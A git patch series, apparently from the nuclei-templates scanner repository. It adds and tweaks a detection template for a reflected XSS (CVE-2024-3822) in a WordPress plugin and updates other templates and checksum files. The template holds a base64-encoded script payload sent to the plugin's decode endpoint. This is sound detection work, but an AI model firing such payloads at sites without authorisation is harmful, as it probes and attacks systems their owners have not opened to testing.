leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-3822 + cwe-id: CWE-79 + metadata: + max-request: 1 + verified: true + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains(body, "

")' + condition: and From 9b8dfe29b0b9e48666f9f763485dc95df634a4a8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:01:56 +0000 Subject: [PATCH 548/847] Auto Generated Templates Checksum [Sat Jun 1 06:01:56 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 087ffde753..ea3b3872ff 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6784,7 +6784,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e +http/technologies/favicon-detect.yaml:787a91503baf3ab099ccfb767208719227d9953c http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -8384,7 +8384,7 @@ javascript/cves/2020/CVE-2020-7247.yaml:60f4be8c576cc07ffa7b843ff99a5678b096df0b javascript/cves/2023/CVE-2023-34039.yaml:af0340b7a937d8e4583b64c5e500566328c6ae51 javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 javascript/cves/2023/CVE-2023-48795.yaml:cb420dbeb5e653c4a7c056fa2c95d53dd347d29b -javascript/cves/2024/CVE-2024-23897.yaml:fcd41e7a0767d210fc075e34cd1775b4f2a39625 +javascript/cves/2024/CVE-2024-23897.yaml:367d94de33e51bd1edb3b5d350b6287fd1d95dc3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f @@ -8612,7 +8612,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:aaafa43ba87bc0f6c826b47c6238ecbfea75be99 +templates-checksum.txt:880f5ed1cba67947c180f6c9ccd0dce34c3a7664 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3dc88dc1fbcb153bec666352cd384b630f6cbf51 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 11:32:34 +0530 Subject: [PATCH 550/847] Update easy-wi-installer.yaml --- http/misconfiguration/installer/easy-wi-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/easy-wi-installer.yaml b/http/misconfiguration/installer/easy-wi-installer.yaml index 4f4691b875..6cebed2f58 100644 --- a/http/misconfiguration/installer/easy-wi-installer.yaml +++ b/http/misconfiguration/installer/easy-wi-installer.yaml @@ -24,11 +24,6 @@ http: words: - "Welcome to the Easy-WI installer!" - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 24cb459f5f53be8009561d576116ef8024801c33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:03:58 +0000 Subject: [PATCH 551/847] Auto Template Signing [Sat Jun 1 06:03:58 UTC 2024] :robot: --- http/technologies/favicon-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 813739a59c..1084b423c3 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3760,4 +3760,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4a0a00473045022100afa60b596fe20299d482f935df87359f0c8fb824c709cb56ef1f08634909a2000220316c27df890a1e6cb71ae4fe147ccd2465493542520ed705054c5a8df06cc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a2a418d1798a07774487359ddbdc2b6befe4a4ad186f241f08a56404d37df790220322ca8fdab4f82fabdddefaf154e22cc7e895577e6bd594f55b8d32ba215116e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c74b7fae9f86d4f72f5ddbf35ee3eebf00eb6c1f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:17:28 +0000 Subject: [PATCH 552/847] Auto Generated New Template Addition List [Sat Jun 1 06:17:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c290ee6664..af7c0e323e 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/confluence-installer.yaml http/misconfiguration/installer/cubebackup-setup-installer.yaml +http/misconfiguration/installer/easy-wi-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml From 61f2bb58130efbc46da8417d183c69c22f91255a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:17:39 +0000 Subject: [PATCH 553/847] Auto Generated Templates Checksum [Sat Jun 1 06:17:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ea3b3872ff..9ee1bd50ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5433,6 +5433,7 @@ http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817 http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 +http/misconfiguration/installer/easy-wi-installer.yaml:14eb6844fda91c30995bfa4594c861c3c4954615 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/ejbca-enterprise-installer.yaml:b44ca7bfe9568e4ff18fc5557d3363de848f5a67 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 @@ -6784,7 +6785,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:787a91503baf3ab099ccfb767208719227d9953c +http/technologies/favicon-detect.yaml:c4e7bbeee04fbae29183ae8edd2978a693c039d1 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -8612,7 +8613,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:880f5ed1cba67947c180f6c9ccd0dce34c3a7664 +templates-checksum.txt:485baac77da1c1ca6850dc44971b8028a6501e4d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4f5f3104d1563b85728a3992eb74bff875ffd4b4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:18:18 +0000 Subject: [PATCH 554/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index df3c596f3e..3ba1725dc3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -30,6 +30,7 @@ on: - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/confluence-installer.yaml' - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml' + - 'http/misconfiguration/installer/easy-wi-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' From 7490d98a1bc324d6794bd8987b939820e7db6eb3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:19:22 +0000 Subject: [PATCH 555/847] Auto Template Signing [Sat Jun 1 06:19:22 UTC 2024] :robot: --- http/misconfiguration/installer/easy-wi-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/easy-wi-installer.yaml b/http/misconfiguration/installer/easy-wi-installer.yaml index 6cebed2f58..f2b8147926 100644 --- a/http/misconfiguration/installer/easy-wi-installer.yaml +++ b/http/misconfiguration/installer/easy-wi-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502204d9aa6d1fbedf0c798369d9b66b0952afe742fa84fd23eb0d00243e08cb1b5ee0221008f704164e63b797e8c7457041c6b5e8d3b72cdac219b90538f90c26a2c7a5528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c7c77fdcc2af0f0a5ebf9abd1428ac6709a5c6d8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jun 2024 11:49:40 +0530 Subject: [PATCH 556/847] minor update --- http/cves/2024/CVE-2024-3822.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index efebda38db..d3f41720ba 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -6,29 +6,32 @@ info: severity: medium description: | The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: | + reference: |- - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2024-3822 cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.0866 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "wp-content/plugins/base64-encoderdecoder/" tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder http: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4=" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - - 'contains(body, "

")' + - 'contains(body, "

")' condition: and From 73e54615383e26fcb8ffd7b35ba4ac4d4097f109 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 11:51:52 +0530 Subject: [PATCH 557/847] fix template --- http/cves/2024/CVE-2024-3822.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index d3f41720ba..e70a26f13c 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -6,7 +6,7 @@ info: severity: medium description: | The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: |- + reference: | - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ @@ -33,5 +33,5 @@ http: dsl: - 'status_code == 200' - 'contains(header, "text/html")' - - 'contains(body, "

")' + - 'contains(body, "

")' condition: and From e76853e9466b8bb891142898d49de14eb41919a7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:24:35 +0000 Subject: [PATCH 558/847] Auto Generated New Template Addition List [Sat Jun 1 06:24:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index af7c0e323e..634104ea53 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml +http/cves/2024/CVE-2024-3822.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml From c408cd025db7d1fb6f5560b0fae340bb43465410 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:24:39 +0000 Subject: [PATCH 559/847] Auto Generated Templates Checksum [Sat Jun 1 06:24:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ee1bd50ce..92f757c619 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3311,6 +3311,7 @@ http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 +http/cves/2024/CVE-2024-3822.yaml:e70a67d151ade654abc8ca4a6bc9d296073d6123 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 @@ -5433,7 +5434,7 @@ http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817 http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 -http/misconfiguration/installer/easy-wi-installer.yaml:14eb6844fda91c30995bfa4594c861c3c4954615 +http/misconfiguration/installer/easy-wi-installer.yaml:4d27fe3eb5f34b9a75dd2ca7f4213b7e400ba104 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/ejbca-enterprise-installer.yaml:b44ca7bfe9568e4ff18fc5557d3363de848f5a67 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 @@ -8613,7 +8614,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:485baac77da1c1ca6850dc44971b8028a6501e4d +templates-checksum.txt:7699d41e3854e2471b4942f0947e77c3fb0259ea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 93ce240b4df00a8891926f63b9e800aeb381d381 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:25:23 +0000 Subject: [PATCH 560/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3ba1725dc3..ba624c0b34 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2024/CVE-2024-24919.yaml' - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' + - 'http/cves/2024/CVE-2024-3822.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' From cbc2220fd6fc47eb9f7d771f981a5943bcb25091 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:26:31 +0000 Subject: [PATCH 561/847] Auto Template Signing [Sat Jun 1 06:26:31 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3822.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index e70a26f13c..701c9b23f8 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -35,3 +35,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "

")' condition: and +# digest: 490a004630440220167f065e360fd80541c2b69728e0f3749a99e3b73a6823ec510fa37bda6fbf1002205c5394d8306ae3f4e96c5bc535563f00e5bee5776948d717b013aa594ec46219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a6d4f5de35b8926c46a2e3c90fdf1c264ef16140 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 1 Jun 2024 10:29:33 +0400 Subject: [PATCH 562/847] Update directory-listing.yaml --- http/miscellaneous/directory-listing.yaml | 47 ++++++++++++++--------- 1 file changed, 28 insertions(+), 19 deletions(-) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index b183a7f32e..9e73bb7eaa 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -5,10 +5,14 @@ info: author: theMiddle severity: low description: Directory Indexing is a web server feature that allows the contents of a directory to be displayed when no index file is present. This can be a security risk as it can expose sensitive files, old backup or unreferenced files. + impact: | + Sensitive files and directories may be exposed to unauthorized users. + remediation: | + Disable directory listing in the web server configuration. reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information - https://portswigger.net/kb/issues/00600100_directory-listing - tags: miscellaneous,misc,generic,misconfguration,web + tags: misc,generic,misconfig,fuzz flow: | function target_is_in_scope(url) { @@ -52,16 +56,17 @@ http: - method: GET path: - "{{BaseURL}}" - redirects: true + + host-redirects: true + max-redirects: 2 matchers: - - type: status + - type: dsl internal: true - status: - - 200 - - type: word - words: - - "text/html" - part: header + dsl: + - contains(header, "text/html") + - status_code_1 == 200 + condition: and + extractors: - type: xpath name: links @@ -73,18 +78,22 @@ http: - method: GET path: - "{{BaseURL}}{{path_to_check}}" - redirects: true + + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - - type: status - internal: true - status: - - 200 - - type: word - words: - - "text/html" - part: header - type: word + part: body words: - "Index of" - part: body + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 2192e614254da658dc5baf3c0eed91e44e594bf0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 06:51:14 +0000 Subject: [PATCH 564/847] Auto Generated Templates Checksum [Sat Jun 1 06:51:14 UTC 2024] :robot: --- templates-checksum.txt | 3632 ++++++++++++++++++++-------------------- 1 file changed, 1816 insertions(+), 1816 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92f757c619..5245076309 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -894,2426 +894,2426 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:ce532c48b5e65624cefb884818 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:24e33df8f32dc3625dd9ae3f8e98055a47dfeedd http/credential-stuffing/self-hosted/grafana-login-check.yaml:0b82037ff4e9c72df81aa93d7c7f5c745866c664 http/credential-stuffing/self-hosted/jira-login-check.yaml:968e46885f51c77a83c0698e59e96c37b37ea8b8 -http/cves/2000/CVE-2000-0114.yaml:a16407d5ff25ba4e4b20bf569c4b2b72fb9314f6 -http/cves/2001/CVE-2001-0537.yaml:dfc71590b21157df096e56a911d803c4dfc5d487 -http/cves/2002/CVE-2002-1131.yaml:8c472964e890b65914d51945956af08d157683c5 +http/cves/2000/CVE-2000-0114.yaml:cde077e4cc4205ac3e06b13137f1882f457a3231 +http/cves/2001/CVE-2001-0537.yaml:fbfbd1e2d066d791fe2a6676ff00e50e85265fbc +http/cves/2002/CVE-2002-1131.yaml:a3c7f79b103646e11a8da3cf2a22094452e459a3 http/cves/2004/CVE-2004-0519.yaml:7968af9d55ad3d7db45d4978c04830f4b81a26ed -http/cves/2004/CVE-2004-1965.yaml:e28b61ebb6599f30be2cc81181374b86633ae203 +http/cves/2004/CVE-2004-1965.yaml:5da4f328bccbc13de52a9cda87bb775aaea45595 http/cves/2005/CVE-2005-2428.yaml:014d3a09f56e144c520b80336166df118252095d -http/cves/2005/CVE-2005-3344.yaml:0f6ed032ee2a10d879467dd1b98913641410916a -http/cves/2005/CVE-2005-3634.yaml:0cbf160e58df8839a73f7b898045f317c64b4862 +http/cves/2005/CVE-2005-3344.yaml:fb49ecd39f4b35179e4c70e42dbfe1fe66621b78 +http/cves/2005/CVE-2005-3634.yaml:fb7899762957cac6b841ca1ab13e38e8607989d8 http/cves/2005/CVE-2005-4385.yaml:20057d0cba302dc1bad5953124947e0267033c89 http/cves/2006/CVE-2006-1681.yaml:3dab8b5c90252f5c915312e7ad02426c2d60f98f -http/cves/2006/CVE-2006-2842.yaml:eafb416900150498d39f3f164834f1e5c93744c4 -http/cves/2007/CVE-2007-0885.yaml:98a6ef21fd877f8cbd47bce3516e4d4725956d40 -http/cves/2007/CVE-2007-3010.yaml:8c3c0a7dac1a3ee6d58c166036a86216ebd9fac5 -http/cves/2007/CVE-2007-4504.yaml:109b16a1bc2cac31ca2cda31fc6cc422fb6081ff -http/cves/2007/CVE-2007-4556.yaml:ad45fad1fff716c2675235c2bb0e6dec6c60b514 -http/cves/2007/CVE-2007-5728.yaml:62d4c87bc30c3d3dc66d0a2cd41b92df49037c62 +http/cves/2006/CVE-2006-2842.yaml:79af29153d57a8ab320e48e514308b5969d50793 +http/cves/2007/CVE-2007-0885.yaml:efbc944aa9eb01d384f65a4006bafb08434a249f +http/cves/2007/CVE-2007-3010.yaml:c5b1830593514312a48ab6f5b6bd184fda184644 +http/cves/2007/CVE-2007-4504.yaml:709bbb828ede5998c8222d8f5f25bfec65de3629 +http/cves/2007/CVE-2007-4556.yaml:47f15309aea6f64a71100bdcac276fd7b60a5a1c +http/cves/2007/CVE-2007-5728.yaml:694fbdd17183242f9d3bc3ef45c6d912d363fe32 http/cves/2008/CVE-2008-1059.yaml:a6e88a29e1382a7a92d2465b513ffd1223d870b9 -http/cves/2008/CVE-2008-1061.yaml:1fd11cadc3d59c7dbbe486aeeccf88afaf4806fa -http/cves/2008/CVE-2008-1547.yaml:7150f0c9df4626d0535ad3f1bd01076a61e634aa +http/cves/2008/CVE-2008-1061.yaml:cc5934daa30075510da0ff11325518ae3f17f298 +http/cves/2008/CVE-2008-1547.yaml:dc4f20c357b0117d721a81265352ba6fda6261d1 http/cves/2008/CVE-2008-2398.yaml:f5c4cb5d6dafa0a882eae29c89bb6a3982ba69a4 -http/cves/2008/CVE-2008-2650.yaml:ea64d55814ac2da9fc731aeaebf2e7655bfe23df +http/cves/2008/CVE-2008-2650.yaml:d53dd7bfee4c739dda510e5ee2eb613dc697cba3 http/cves/2008/CVE-2008-4668.yaml:dd5527612e924d9a59ac3c58c998cacc8e70441c -http/cves/2008/CVE-2008-4764.yaml:de6e2d6abde105eca9553b1b82210a4a27d4a44f -http/cves/2008/CVE-2008-5587.yaml:eaa2391bce50e8ac9e393ab7c6f25f0eca432fa0 -http/cves/2008/CVE-2008-6080.yaml:268dd3e60e61080822e98998ee82395cc755b315 -http/cves/2008/CVE-2008-6172.yaml:5c414092d2b10360892211cb195e7b28041a9acf -http/cves/2008/CVE-2008-6222.yaml:3ae77fbf574af2a10e650dbdd9b4136f5a23b549 -http/cves/2008/CVE-2008-6465.yaml:4ff63a0f9d41e0045d4d044e676d53e110824089 -http/cves/2008/CVE-2008-6668.yaml:b75c190a75a7b5bf7b8e6ddc57b720f80b90e458 +http/cves/2008/CVE-2008-4764.yaml:63ba6b935c0bc87ae3438339221d4abf72d7a40f +http/cves/2008/CVE-2008-5587.yaml:c969a2f642a97ab738fb778c8cb11abf2f2d35be +http/cves/2008/CVE-2008-6080.yaml:34bc601e2cae9ecfc1d3f364787e95cc3025847b +http/cves/2008/CVE-2008-6172.yaml:c4f0f39106b0ec3b7ee708f17269d7b119486ea4 +http/cves/2008/CVE-2008-6222.yaml:48c6332172c9f3e7108ae6845e1c7a62d702281e +http/cves/2008/CVE-2008-6465.yaml:f2b2f886234800bb98db1ab9c3838867de620f3f +http/cves/2008/CVE-2008-6668.yaml:5db9e940887500dacc04bd5d9e64b078cf83e2fc http/cves/2008/CVE-2008-6982.yaml:ec7e061e851cd73e256f6cc2b73658bf631d9bc2 -http/cves/2008/CVE-2008-7269.yaml:619bb5e5f049dd812933a2c7b890618786ea5083 +http/cves/2008/CVE-2008-7269.yaml:74a76cbd660b63a451ad28b5c6e499d603951fcd http/cves/2009/CVE-2009-0347.yaml:5ce90e313f49f7c658c8208dc28b030f6ad68263 -http/cves/2009/CVE-2009-0545.yaml:f918c65721ede03f075a54f7d5dfd57f8b61214e -http/cves/2009/CVE-2009-0932.yaml:fe6e4a1fdf707fe7a0e33bd3310b79a46243a507 -http/cves/2009/CVE-2009-1151.yaml:41322ed9227e7d24fbf5fa4d95928add8914b79f +http/cves/2009/CVE-2009-0545.yaml:b4854e41056f1f4f88bfdd1599ee38b8701fa0ac +http/cves/2009/CVE-2009-0932.yaml:cd229881a65cca2a507a2f19b7bd7040b7e6f3ac +http/cves/2009/CVE-2009-1151.yaml:fbb8a9780edd67f308652e8ca20f2e049753a369 http/cves/2009/CVE-2009-1496.yaml:3b7fd77b1a4aa689f73d36ecdb6b3e5fa5ad4367 http/cves/2009/CVE-2009-1558.yaml:7311f5b1b9a9fe041ce4ffbd34daf2e6fe0e7538 -http/cves/2009/CVE-2009-1872.yaml:6db7c6cb3c42e9b3fe63827c37a1fa7f20ca15bc +http/cves/2009/CVE-2009-1872.yaml:394ba582c49eeda94980cd622fa95b3c7beefad3 